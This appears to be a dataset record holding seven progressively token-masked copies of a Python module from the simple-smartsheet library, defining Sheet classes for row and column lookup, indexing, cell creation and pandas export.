"<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<assignment token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass _SheetBase(CoreObject, Generic[RowT, ColumnT]):\n <docstring token>\n name: str\n id: Optional[int] = None\n access_level: Optional[str] = None\n permalink: Optional[str] = None\n favorite: Optional[bool] = None\n created_at: Optional[datetime] = None\n modified_at: Optional[datetime] = None\n version: Optional[int] = None\n total_row_count: Optional[int] = None\n effective_attachment_options: List[str] = attr.Factory(list)\n gantt_enabled: Optional[bool] = None\n read_only: Optional[bool] = None\n dependencies_enabled: Optional[bool] = None\n resource_management_enabled: Optional[bool] = None\n cell_image_upload_enabled: Optional[bool] = None\n user_settings: Optional[UserSettings] = None\n user_permissions: Optional[UserPermissions] = None\n has_summary_fields: Optional[bool] = None\n is_multi_picklist_enabled: Optional[bool] = None\n columns: List[ColumnT] = attr.Factory(list)\n rows: List[RowT] = attr.Factory(list)\n workspace: Optional[Workspace] = None\n _row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _row_id_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _column_title_to_column: Dict[str, ColumnT] = attr.ib(attr.Factory(dict\n ), init=False)\n _column_id_to_column: Dict[int, ColumnT] = attr.ib(attr.Factory(dict),\n init=False)\n indexes: IndexesType = attr.ib(attr.Factory(dict), init=False)\n _schema: ClassVar[Type[SheetSchema]] = SheetSchema\n\n def __attrs_post_init__(self) ->None:\n self._update_column_lookup()\n self._update_row_cell_lookup()\n <function token>\n\n def _update_row_cell_lookup(self) ->None:\n self._row_num_to_row.clear()\n self._row_id_to_row.clear()\n for row in self.rows:\n if row.num:\n self._row_num_to_row[row.num] = row\n if row.id:\n self._row_id_to_row[row.id] = row\n row._update_cell_lookup(self)\n\n def build_index(self, indexes: List[IndexKeysDict]) ->None:\n for index in indexes:\n columns = index['columns']\n unique = index['unique']\n self.indexes[columns] = {'index': {}, 'unique': unique}\n for row in self.rows:\n row._update_index(self)\n\n def get_row(self, row_num: Optional[int]=None, row_id: Optional[int]=\n None, filter: Optional[Dict[str, Any]]=None) ->Optional[RowT]:\n \"\"\"Returns Row object by row number or ID\n\n Either row_num or row_id must be provided\n\n Args:\n row_num: row number\n row_id: row id\n filter: a dictionary with column title to value\n mappings in the same order as index was built. Index must be unique.\n\n Returns:\n Row object\n \"\"\"\n if row_num is not None:\n return self._row_num_to_row.get(row_num)\n elif row_id is not None:\n return self._row_id_to_row.get(row_id)\n elif filter is not None:\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if not unique:\n raise exceptions.SmartsheetIndexNotUnique(\n f'Index {columns} is non-unique and lookup will potentially return multiple rows, use get_rows method instead'\n )\n index = cast(Dict[Tuple[Any, ...], RowT], index_dict['index'])\n return index[query]\n else:\n raise ValueError(\n 'Either row_num or row_id argument should be provided')\n <function token>\n\n def get_column(self, column_title: Optional[str]=None, column_id:\n Optional[int]=None) ->ColumnT:\n \"\"\"Returns Column object by column title or ID\n\n Either column_title or column_id must be provided\n\n Args:\n column_title: column title (case-sensitive)\n column_id: column id\n\n Returns:\n Column object\n \"\"\"\n if column_title is not None:\n return self._column_title_to_column[column_title]\n elif column_id is not None:\n return self._column_id_to_column[column_id]\n else:\n raise ValueError(\n 'Either column_title or column_id argument should be provided')\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, Any]) ->List[Cell]:\n \"\"\"Create a list of Cell objects from dictionary\n\n Args:\n fields: dictionary where key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
"<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<assignment token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass _SheetBase(CoreObject, Generic[RowT, ColumnT]):\n <docstring token>\n name: str\n id: Optional[int] = None\n access_level: Optional[str] = None\n permalink: Optional[str] = None\n favorite: Optional[bool] = None\n created_at: Optional[datetime] = None\n modified_at: Optional[datetime] = None\n version: Optional[int] = None\n total_row_count: Optional[int] = None\n effective_attachment_options: List[str] = attr.Factory(list)\n gantt_enabled: Optional[bool] = None\n read_only: Optional[bool] = None\n dependencies_enabled: Optional[bool] = None\n resource_management_enabled: Optional[bool] = None\n cell_image_upload_enabled: Optional[bool] = None\n user_settings: Optional[UserSettings] = None\n user_permissions: Optional[UserPermissions] = None\n has_summary_fields: Optional[bool] = None\n is_multi_picklist_enabled: Optional[bool] = None\n columns: List[ColumnT] = attr.Factory(list)\n rows: List[RowT] = attr.Factory(list)\n workspace: Optional[Workspace] = None\n _row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _row_id_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _column_title_to_column: Dict[str, ColumnT] = attr.ib(attr.Factory(dict\n ), init=False)\n _column_id_to_column: Dict[int, ColumnT] = attr.ib(attr.Factory(dict),\n init=False)\n indexes: IndexesType = attr.ib(attr.Factory(dict), init=False)\n _schema: ClassVar[Type[SheetSchema]] = SheetSchema\n <function token>\n <function token>\n\n def _update_row_cell_lookup(self) ->None:\n self._row_num_to_row.clear()\n self._row_id_to_row.clear()\n for row in self.rows:\n if row.num:\n self._row_num_to_row[row.num] = row\n if row.id:\n self._row_id_to_row[row.id] = row\n row._update_cell_lookup(self)\n\n def build_index(self, indexes: List[IndexKeysDict]) ->None:\n for index in indexes:\n columns = index['columns']\n unique = index['unique']\n self.indexes[columns] = {'index': {}, 'unique': unique}\n for row in self.rows:\n row._update_index(self)\n\n def get_row(self, row_num: Optional[int]=None, row_id: Optional[int]=\n None, filter: Optional[Dict[str, Any]]=None) ->Optional[RowT]:\n \"\"\"Returns Row object by row number or ID\n\n Either row_num or row_id must be provided\n\n Args:\n row_num: row number\n row_id: row id\n filter: a dictionary with column title to value\n mappings in the same order as index was built. Index must be unique.\n\n Returns:\n Row object\n \"\"\"\n if row_num is not None:\n return self._row_num_to_row.get(row_num)\n elif row_id is not None:\n return self._row_id_to_row.get(row_id)\n elif filter is not None:\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if not unique:\n raise exceptions.SmartsheetIndexNotUnique(\n f'Index {columns} is non-unique and lookup will potentially return multiple rows, use get_rows method instead'\n )\n index = cast(Dict[Tuple[Any, ...], RowT], index_dict['index'])\n return index[query]\n else:\n raise ValueError(\n 'Either row_num or row_id argument should be provided')\n <function token>\n\n def get_column(self, column_title: Optional[str]=None, column_id:\n Optional[int]=None) ->ColumnT:\n \"\"\"Returns Column object by column title or ID\n\n Either column_title or column_id must be provided\n\n Args:\n column_title: column title (case-sensitive)\n column_id: column id\n\n Returns:\n Column object\n \"\"\"\n if column_title is not None:\n return self._column_title_to_column[column_title]\n elif column_id is not None:\n return self._column_id_to_column[column_id]\n else:\n raise ValueError(\n 'Either column_title or column_id argument should be provided')\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, Any]) ->List[Cell]:\n \"\"\"Create a list of Cell objects from dictionary\n\n Args:\n fields: dictionary where key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
"<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<assignment token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass _SheetBase(CoreObject, Generic[RowT, ColumnT]):\n <docstring token>\n name: str\n id: Optional[int] = None\n access_level: Optional[str] = None\n permalink: Optional[str] = None\n favorite: Optional[bool] = None\n created_at: Optional[datetime] = None\n modified_at: Optional[datetime] = None\n version: Optional[int] = None\n total_row_count: Optional[int] = None\n effective_attachment_options: List[str] = attr.Factory(list)\n gantt_enabled: Optional[bool] = None\n read_only: Optional[bool] = None\n dependencies_enabled: Optional[bool] = None\n resource_management_enabled: Optional[bool] = None\n cell_image_upload_enabled: Optional[bool] = None\n user_settings: Optional[UserSettings] = None\n user_permissions: Optional[UserPermissions] = None\n has_summary_fields: Optional[bool] = None\n is_multi_picklist_enabled: Optional[bool] = None\n columns: List[ColumnT] = attr.Factory(list)\n rows: List[RowT] = attr.Factory(list)\n workspace: Optional[Workspace] = None\n _row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _row_id_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _column_title_to_column: Dict[str, ColumnT] = attr.ib(attr.Factory(dict\n ), init=False)\n _column_id_to_column: Dict[int, ColumnT] = attr.ib(attr.Factory(dict),\n init=False)\n indexes: IndexesType = attr.ib(attr.Factory(dict), init=False)\n _schema: ClassVar[Type[SheetSchema]] = SheetSchema\n <function token>\n <function token>\n\n def _update_row_cell_lookup(self) ->None:\n self._row_num_to_row.clear()\n self._row_id_to_row.clear()\n for row in self.rows:\n if row.num:\n self._row_num_to_row[row.num] = row\n if row.id:\n self._row_id_to_row[row.id] = row\n row._update_cell_lookup(self)\n\n def build_index(self, indexes: List[IndexKeysDict]) ->None:\n for index in indexes:\n columns = index['columns']\n unique = index['unique']\n self.indexes[columns] = {'index': {}, 'unique': unique}\n for row in self.rows:\n row._update_index(self)\n <function token>\n <function token>\n\n def get_column(self, column_title: Optional[str]=None, column_id:\n Optional[int]=None) ->ColumnT:\n \"\"\"Returns Column object by column title or ID\n\n Either column_title or column_id must be provided\n\n Args:\n column_title: column title (case-sensitive)\n column_id: column id\n\n Returns:\n Column object\n \"\"\"\n if column_title is not None:\n return self._column_title_to_column[column_title]\n elif column_id is not None:\n return self._column_id_to_column[column_id]\n else:\n raise ValueError(\n 'Either column_title or column_id argument should be provided')\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, Any]) ->List[Cell]:\n \"\"\"Create a list of Cell objects from dictionary\n\n Args:\n fields: dictionary where key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
"<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<assignment token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass _SheetBase(CoreObject, Generic[RowT, ColumnT]):\n <docstring token>\n name: str\n id: Optional[int] = None\n access_level: Optional[str] = None\n permalink: Optional[str] = None\n favorite: Optional[bool] = None\n created_at: Optional[datetime] = None\n modified_at: Optional[datetime] = None\n version: Optional[int] = None\n total_row_count: Optional[int] = None\n effective_attachment_options: List[str] = attr.Factory(list)\n gantt_enabled: Optional[bool] = None\n read_only: Optional[bool] = None\n dependencies_enabled: Optional[bool] = None\n resource_management_enabled: Optional[bool] = None\n cell_image_upload_enabled: Optional[bool] = None\n user_settings: Optional[UserSettings] = None\n user_permissions: Optional[UserPermissions] = None\n has_summary_fields: Optional[bool] = None\n is_multi_picklist_enabled: Optional[bool] = None\n columns: List[ColumnT] = attr.Factory(list)\n rows: List[RowT] = attr.Factory(list)\n workspace: Optional[Workspace] = None\n _row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _row_id_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _column_title_to_column: Dict[str, ColumnT] = attr.ib(attr.Factory(dict\n ), init=False)\n _column_id_to_column: Dict[int, ColumnT] = attr.ib(attr.Factory(dict),\n init=False)\n indexes: IndexesType = attr.ib(attr.Factory(dict), init=False)\n _schema: ClassVar[Type[SheetSchema]] = SheetSchema\n <function token>\n <function token>\n\n def _update_row_cell_lookup(self) ->None:\n self._row_num_to_row.clear()\n self._row_id_to_row.clear()\n for row in self.rows:\n if row.num:\n self._row_num_to_row[row.num] = row\n if row.id:\n self._row_id_to_row[row.id] = row\n row._update_cell_lookup(self)\n\n def build_index(self, indexes: List[IndexKeysDict]) ->None:\n for index in indexes:\n columns = index['columns']\n unique = index['unique']\n self.indexes[columns] = {'index': {}, 'unique': unique}\n for row in self.rows:\n row._update_index(self)\n <function token>\n <function token>\n\n def get_column(self, column_title: Optional[str]=None, column_id:\n Optional[int]=None) ->ColumnT:\n \"\"\"Returns Column object by column title or ID\n\n Either column_title or column_id must be provided\n\n Args:\n column_title: column title (case-sensitive)\n column_id: column id\n\n Returns:\n Column object\n \"\"\"\n if column_title is not None:\n return self._column_title_to_column[column_title]\n elif column_id is not None:\n return self._column_id_to_column[column_id]\n else:\n raise ValueError(\n 'Either column_title or column_id argument should be provided')\n <function token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, Any]) ->List[Cell]:\n \"\"\"Create a list of Cell objects from dictionary\n\n Args:\n fields: dictionary where key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
"<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<assignment token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass _SheetBase(CoreObject, Generic[RowT, ColumnT]):\n <docstring token>\n name: str\n id: Optional[int] = None\n access_level: Optional[str] = None\n permalink: Optional[str] = None\n favorite: Optional[bool] = None\n created_at: Optional[datetime] = None\n modified_at: Optional[datetime] = None\n version: Optional[int] = None\n total_row_count: Optional[int] = None\n effective_attachment_options: List[str] = attr.Factory(list)\n gantt_enabled: Optional[bool] = None\n read_only: Optional[bool] = None\n dependencies_enabled: Optional[bool] = None\n resource_management_enabled: Optional[bool] = None\n cell_image_upload_enabled: Optional[bool] = None\n user_settings: Optional[UserSettings] = None\n user_permissions: Optional[UserPermissions] = None\n has_summary_fields: Optional[bool] = None\n is_multi_picklist_enabled: Optional[bool] = None\n columns: List[ColumnT] = attr.Factory(list)\n rows: List[RowT] = attr.Factory(list)\n workspace: Optional[Workspace] = None\n _row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _row_id_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _column_title_to_column: Dict[str, ColumnT] = attr.ib(attr.Factory(dict\n ), init=False)\n _column_id_to_column: Dict[int, ColumnT] = attr.ib(attr.Factory(dict),\n init=False)\n indexes: IndexesType = attr.ib(attr.Factory(dict), init=False)\n _schema: ClassVar[Type[SheetSchema]] = SheetSchema\n <function token>\n <function token>\n <function token>\n\n def build_index(self, indexes: List[IndexKeysDict]) ->None:\n for index in indexes:\n columns = index['columns']\n unique = index['unique']\n self.indexes[columns] = {'index': {}, 'unique': unique}\n for row in self.rows:\n row._update_index(self)\n <function token>\n <function token>\n\n def get_column(self, column_title: Optional[str]=None, column_id:\n Optional[int]=None) ->ColumnT:\n \"\"\"Returns Column object by column title or ID\n\n Either column_title or column_id must be provided\n\n Args:\n column_title: column title (case-sensitive)\n column_id: column id\n\n Returns:\n Column object\n \"\"\"\n if column_title is not None:\n return self._column_title_to_column[column_title]\n elif column_id is not None:\n return self._column_id_to_column[column_id]\n else:\n raise ValueError(\n 'Either column_title or column_id argument should be provided')\n <function token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, Any]) ->List[Cell]:\n \"\"\"Create a list of Cell objects from dictionary\n\n Args:\n fields: dictionary where key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
"<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<assignment token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass _SheetBase(CoreObject, Generic[RowT, ColumnT]):\n <docstring token>\n name: str\n id: Optional[int] = None\n access_level: Optional[str] = None\n permalink: Optional[str] = None\n favorite: Optional[bool] = None\n created_at: Optional[datetime] = None\n modified_at: Optional[datetime] = None\n version: Optional[int] = None\n total_row_count: Optional[int] = None\n effective_attachment_options: List[str] = attr.Factory(list)\n gantt_enabled: Optional[bool] = None\n read_only: Optional[bool] = None\n dependencies_enabled: Optional[bool] = None\n resource_management_enabled: Optional[bool] = None\n cell_image_upload_enabled: Optional[bool] = None\n user_settings: Optional[UserSettings] = None\n user_permissions: Optional[UserPermissions] = None\n has_summary_fields: Optional[bool] = None\n is_multi_picklist_enabled: Optional[bool] = None\n columns: List[ColumnT] = attr.Factory(list)\n rows: List[RowT] = attr.Factory(list)\n workspace: Optional[Workspace] = None\n _row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _row_id_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _column_title_to_column: Dict[str, ColumnT] = attr.ib(attr.Factory(dict\n ), init=False)\n _column_id_to_column: Dict[int, ColumnT] = attr.ib(attr.Factory(dict),\n init=False)\n indexes: IndexesType = attr.ib(attr.Factory(dict), init=False)\n _schema: ClassVar[Type[SheetSchema]] = SheetSchema\n <function token>\n <function token>\n <function token>\n\n def build_index(self, indexes: List[IndexKeysDict]) ->None:\n for index in indexes:\n columns = index['columns']\n unique = index['unique']\n self.indexes[columns] = {'index': {}, 'unique': unique}\n for row in self.rows:\n row._update_index(self)\n <function token>\n <function token>\n <function token>\n <function token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, Any]) ->List[Cell]:\n \"\"\"Create a list of Cell objects from dictionary\n\n Args:\n fields: dictionary where key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
"<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<assignment token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass _SheetBase(CoreObject, Generic[RowT, ColumnT]):\n <docstring token>\n name: str\n id: Optional[int] = None\n access_level: Optional[str] = None\n permalink: Optional[str] = None\n favorite: Optional[bool] = None\n created_at: Optional[datetime] = None\n modified_at: Optional[datetime] = None\n version: Optional[int] = None\n total_row_count: Optional[int] = None\n effective_attachment_options: List[str] = attr.Factory(list)\n gantt_enabled: Optional[bool] = None\n read_only: Optional[bool] = None\n dependencies_enabled: Optional[bool] = None\n resource_management_enabled: Optional[bool] = None\n cell_image_upload_enabled: Optional[bool] = None\n user_settings: Optional[UserSettings] = None\n user_permissions: Optional[UserPermissions] = None\n has_summary_fields: Optional[bool] = None\n is_multi_picklist_enabled: Optional[bool] = None\n columns: List[ColumnT] = attr.Factory(list)\n rows: List[RowT] = attr.Factory(list)\n workspace: Optional[Workspace] = None\n _row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _row_id_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _column_title_to_column: Dict[str, ColumnT] = attr.ib(attr.Factory(dict\n ), init=False)\n _column_id_to_column: Dict[int, ColumnT] = attr.ib(attr.Factory(dict),\n init=False)\n indexes: IndexesType = attr.ib(attr.Factory(dict), init=False)\n _schema: ClassVar[Type[SheetSchema]] = SheetSchema\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, Any]) ->List[Cell]:\n \"\"\"Create a list of Cell objects from dictionary\n\n Args:\n fields: dictionary where key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
